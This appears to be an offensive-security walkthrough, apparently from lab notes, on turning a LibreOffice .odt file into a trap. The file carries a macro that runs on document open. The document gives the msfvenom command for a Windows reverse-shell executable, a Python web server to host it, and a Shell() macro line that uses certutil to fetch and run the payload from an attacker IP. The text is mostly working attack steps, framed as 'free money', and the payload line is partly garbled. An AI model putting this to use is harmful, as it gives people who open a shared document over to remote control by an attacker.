# Exploitation

Getting  a shell with .odt file embedded with malicious macros.&#x20;

Open libreo office by typing libreoffice in terminal.&#x20;

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FOWuqvxg0fby38x1bGfj4%2F2022-07-20_13-52.png?alt=media\&token=13e00665-f834-4d12-92e3-ca57050d3639)

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2Fi4c5jhjMX6rV5IY0I33u%2F2022-07-20_13-53.png?alt=media\&token=6f8abdfa-aee5-4715-bcac-3876acf00893)

To create a macro we will go to Tools > Macros > Organize Macros > Basic

We will then create a new macro which we will name whatever we want.&#x20;

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FxX8GrMJTrYoKhWsHWh4X%2F2022-07-20_13-56.png?alt=media\&token=2c152234-5e8d-4c02-ab50-fe03221dcad5)

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FnmWDV0nzpCHFqONUdqS0%2F2022-07-20_13-56_1.png?alt=media\&token=de18af41-2420-4fc3-aefb-88d73c9e161e)

We will type Shell(" ")

Anything in between those will be executed.&#x20;

So although there is other ways of doing this I would rather have my payload have chances of being executed and not be caught up by an AV by using the multi/handler which automatically encodes the payload.&#x20;

So we will generate our payload.&#x20;

```
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.227 LPORT=443 -f exe -o lyethar-shell-reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: lyethar-shell-reverse.exe
```

And start a python webserver on port 80.&#x20;

```
python3 -m http.server 80                                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Inside the macro between the quotation marks we will paste this payload which will get our generated payload and execute it, resulting in  a reverse shell.&#x20;

```
Shell(“Cmd.exe C net use D Y * && cme.exe C certutil.exe -urlcache -split -f “”http://192.168.49.227:80/lyethar-shell.exe”” C:\Users\Public\lyethar.exe &  C:\Users\Public\lyethar.exe”)
```

Then we save the macro. Once saved we attach the macro to an event that will execute the macro when somebody opens the file.

We will go to Tools > Customize > Events > Open Document > Macro... > Nameofmacro > Standard > Main&#x20;

Save the FIle as odt.&#x20;

Upload and free money.&#x20;

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FO0f9cHikPqlJ4C04NxlN%2F2022-07-20_14-09.png?alt=media\&token=e0728ac9-0a55-4afb-bfce-a8a552557b3f)

Code execution.